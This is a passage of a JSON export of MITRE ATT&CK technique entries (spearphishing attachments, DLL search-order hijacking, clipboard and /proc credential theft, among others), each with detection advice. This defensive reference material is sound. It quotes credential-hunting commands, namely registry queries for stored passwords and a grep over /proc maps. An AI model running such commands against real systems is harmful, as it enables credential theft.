boot record and the disk partition table. Monitor for unusual kernel driver installation activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "1.0", "x_mitre_impact_type": ["Availability"], "x_mitre_permissions_required": ["Administrator", "root", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2e114e45-2c50-404c-804a-3af9564d240e", "created": "2019-03-19T19:38:27.097Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1487", "external_id": "T1487"}, {"source_name": "Symantec Shamoon 2012", "description": "Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.", "url": "https://www.symantec.com/connect/blogs/shamoon-attacks"}, {"source_name": "FireEye Shamoon Nov 2016", "description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.", "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html"}, {"source_name": "Palo Alto Shamoon Nov 2016", "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.", "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"}, {"source_name": "Kaspersky StoneDrill 2017", "description": "Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.", "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf"}, {"source_name": "Unit 42 Shamoon3 2018", "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.", "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-01-31T14:09:27.066Z", "name": "Spearphishing Attachment", "description": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.(Citation: Unit 42 DarkHydrus July 2018) Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Philip Winther"], "x_mitre_deprecated": false, "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.\n\nMonitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows", "Linux"], "x_mitre_version": "2.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", "created": "2020-03-02T19:05:18.137Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1566/001", "external_id": "T1566.001"}, {"source_name": "ACSC Email Spoofing", "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf"}, {"source_name": "Unit 42 DarkHydrus July 2018", "description": "Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.", "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"}, {"source_name": "Microsoft Anti Spoofing", "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.", "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide"}, {"source_name": "Elastic - Koadiac Detection with EQL", "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.", "url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Credentials in Registry", "description": "The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.\n\nExample commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)\n\n* Local Machine Hive: reg query HKLM /f password /t REG_SZ /s\n* Current User Hive: reg query HKCU /f password /t REG_SZ /s", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Sudhanshu Chauhan, @Sudhanshu_C"], "x_mitre_detection": "Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["User", "Administrator"], "x_mitre_system_requirements": ["Ability to query some Registry locations depends on the adversary's level of access. User permissions are usually limited to access of user-related Registry keys."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2edd9d6a-5674-4326-a600-ba56de467286", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1214", "external_id": "T1214"}, {"source_name": "Pentestlab Stored Credentials", "description": "netbiosX. (2017, April 19). Stored Credentials. Retrieved April 6, 2018.", "url": "https://pentestlab.blog/2017/04/19/stored-credentials/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2024-04-16T12:26:49.584Z", "name": "Stripped Payloads", "description": "Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system\u2019s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018)\n\nAdversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Linux", "Windows", "Network"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", "created": "2022-09-29T18:30:12.244Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1027/008", "external_id": "T1027.008"}, {"source_name": "intezer stripped binaries elf files 2018", "description": "Ignacio Sanmillan. (2018, February 7). Executable and Linkable Format 101. Part 2: Symbols. Retrieved September 29, 2022.", "url": "https://www.intezer.com/blog/malware-analysis/executable-linkable-format-101-part-2-symbols/"}, {"source_name": "SentinelLabs reversing run-only applescripts 2021", "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022.", "url": "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/"}, {"source_name": "Mandiant golang stripped binaries explanation", "description": "STEPHEN ECKELS. (2022, February 28). Ready, Set, Go \u2014 Golang Internals and Symbol Recovery. Retrieved September 29, 2022.", "url": "https://www.mandiant.com/resources/blog/golang-internals-symbol-recovery"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Component Object Model", "description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)\n\nVarious COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", "created": "2020-02-12T14:09:53.107Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1559/001", "external_id": "T1559.001"}, {"source_name": "Fireeye Hunting COM June 2019", "description": "Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.", "url": "https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html"}, {"source_name": "Microsoft COM", "description": "Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx"}, {"source_name": "ProjectZero File Write EoP Apr 2018", "description": "Forshaw, J. (2018, April 18). Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege. Retrieved May 3, 2018.", "url": "https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html"}, {"source_name": "Enigma Outlook DCOM Lateral Movement Nov 2017", "description": "Nelson, M. (2017, November 16). Lateral Movement using Outlook's CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.", "url": "https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/"}, {"source_name": "Enigma MMC20 COM Jan 2017", "description": "Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.", "url": "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:02.595Z", "name": "Remote System Information Discovery", "description": "An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the system's operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the system's configuration may be used to scope subsequent technique usage. \n\nRequests for system information are typically implemented using automation and management protocols and are often automatically requested by vendor software during normal operation. This information may be used to tailor management actions, such as program download and system or module firmware. An adversary may leverage this same information by issuing calls directly to the system's API.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Network Traffic: Network Traffic Flow", "Network Traffic: Network Traffic Content", "File: File Access", "Process: Process Creation"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", "created": "2021-04-13T12:45:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0888", "external_id": "T0888"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-28T15:51:58.945Z", "name": "DLL Search Order Hijacking", "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.\n\nThere are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)\n\nPhantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.\n\nAdversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)\n\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Travis Smith, Tripwire", "Stefan Kanthak", "Marina Liang", "Ami Holeston, CrowdStrike", "Will Alexander, CrowdStrike"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of `.manifest` and `.local` redirection files that do not correlate with software updates are suspicious.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", "created": "2020-03-13T18:11:08.357Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1574/001", "external_id": "T1574.001"}, {"source_name": "Adversaries Hijack DLLs", "description": "CrowdStrike, Falcon OverWatch Team. (2022, December 30). Retrieved October 19, 2023.", "url": "https://www.crowdstrike.com/blog/4-ways-adversaries-hijack-dlls/"}, {"source_name": "FireEye Hijacking July 2010", "description": "Harbour, N. (2010, July 15). Malware Persistence without the Windows Registry. Retrieved November 17, 2020.", "url": "https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html"}, {"source_name": "FireEye fxsst June 2011", "description": "Harbour, N. (2011, June 3). What the fxsst?. Retrieved November 17, 2020.", "url": "https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html"}, {"source_name": "Microsoft Security Advisory 2269637", "description": "Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved March 13, 2020.", "url": "https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637"}, {"source_name": "Microsoft Dynamic-Link Library Redirection", "description": "Microsoft. (2018, May 31). Dynamic-Link Library Redirection. Retrieved March 13, 2020.", "url": "https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN"}, {"source_name": "Microsoft Dynamic Link Library Search Order", "description": "Microsoft. (2018, May 31). Dynamic-Link Library Search Order. Retrieved November 30, 2014.", "url": "https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN"}, {"source_name": "Microsoft Manifests", "description": "Microsoft. (n.d.). Manifests. Retrieved December 5, 2014.", "url": "https://msdn.microsoft.com/en-US/library/aa375365"}, {"source_name": "FireEye DLL Search Order Hijacking", "description": "Nick Harbour. (2010, September 1). DLL Search Order Hijacking Revisited. Retrieved March 13, 2020.", "url": "https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html"}, {"source_name": "OWASP Binary Planting", "description": "OWASP. (2013, January 30). Binary planting. Retrieved June 7, 2016.", "url": "https://www.owasp.org/index.php/Binary_planting"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-01-02T13:35:57.680Z", "name": "Automated Collection", "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. \n\nIn cloud-based environments, adversaries may also use cloud APIs, data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data.(Citation: Mandiant UNC3944 SMS Phishing 2023) \n\nThis functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Praetorian"], "x_mitre_deprecated": false, "x_mitre_detection": "Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), as well as through cloud APIs and command line interfaces.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "IaaS", "SaaS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["Permissions to access directories, files, and API endpoints that store information of interest."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", "created": "2017-05-31T21:31:27.985Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1119", "external_id": "T1119"}, {"source_name": "Mandiant UNC3944 SMS Phishing 2023", "description": "Mandiant Intelligence. (2023, September 14). Why Are You Texting Me? UNC3944 Leverages SMS Phishing Campaigns for SIM Swapping, Ransomware, Extortion, and Notoriety. Retrieved January 2, 2024.", "url": "https://www.mandiant.com/resources/blog/unc3944-sms-phishing-sim-swapping-ransomware"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:02.785Z", "name": "Program Upload", "description": "Adversaries may attempt to upload a program from a PLC to gather information about an industrial process. Uploading a program may allow them to acquire and study the underlying logic. Methods of program upload include vendor software, which enables the user to upload and read a program running on a PLC. This software can be used to upload the target program to a workstation, jump box, or an interfacing device.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Network Traffic: Network Traffic Content", "Network Traffic: Network Traffic Flow", "Application Log: Application Log Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0845", "external_id": "T0845"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-04-14T21:51:47.277Z", "name": "Clipboard Data", "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nFor example, on Windows adversaries can access clipboard data by using clip.exe or Get-Clipboard.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users\u2019 clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)\n\nmacOS and Linux also have commands, such as pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", "created": "2017-05-31T21:31:25.967Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1115", "external_id": "T1115"}, {"source_name": "CISA_AA21_200B", "description": "CISA. (2021, August 20). Alert (AA21-200B) Chinese State-Sponsored Cyber Operations: Observed TTPs. Retrieved June 21, 2022.", "url": "https://www.cisa.gov/uscert/ncas/alerts/aa21-200b"}, {"source_name": "mining_ruby_reversinglabs", "description": "Maljic, T. (2020, April 16). Mining for malicious Ruby gems. Retrieved October 15, 2022.", "url": "https://blog.reversinglabs.com/blog/mining-for-malicious-ruby-gems"}, {"source_name": "clip_win_server", "description": "Microsoft, JasonGerend, et al. (2023, February 3). clip. Retrieved June 21, 2022.", "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip"}, {"source_name": "MSDN Clipboard", "description": "Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016.", "url": "https://msdn.microsoft.com/en-us/library/ms649012"}, {"source_name": "Operating with EmPyre", "description": "rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July 12, 2017.", "url": "https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-10T16:41:01.496Z", "name": "Proc Filesystem", "description": "Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process\u2019s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process\u2019s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)\n\nWhen executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as grep -E \"^[0-9a-f-]* r\" /proc/\"$pid\"/maps | cut -d' ' -f 1, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system) When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process\u2019s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)\n\nIf running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Tim (Wadhwa-)Brown"], "x_mitre_deprecated": false, "x_mitre_detection": "To obtain the passwords and hashes stored in memory, processes must open a maps file in the `/proc` filesystem for the process being analyzed. This file is stored under the path `/proc/PID/maps`, where the `PID` directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3120b9fa-23b8-4500-ae73-09494f607b7d", "created": "2020-02-11T18:46:24.434Z", "created_by_ref": 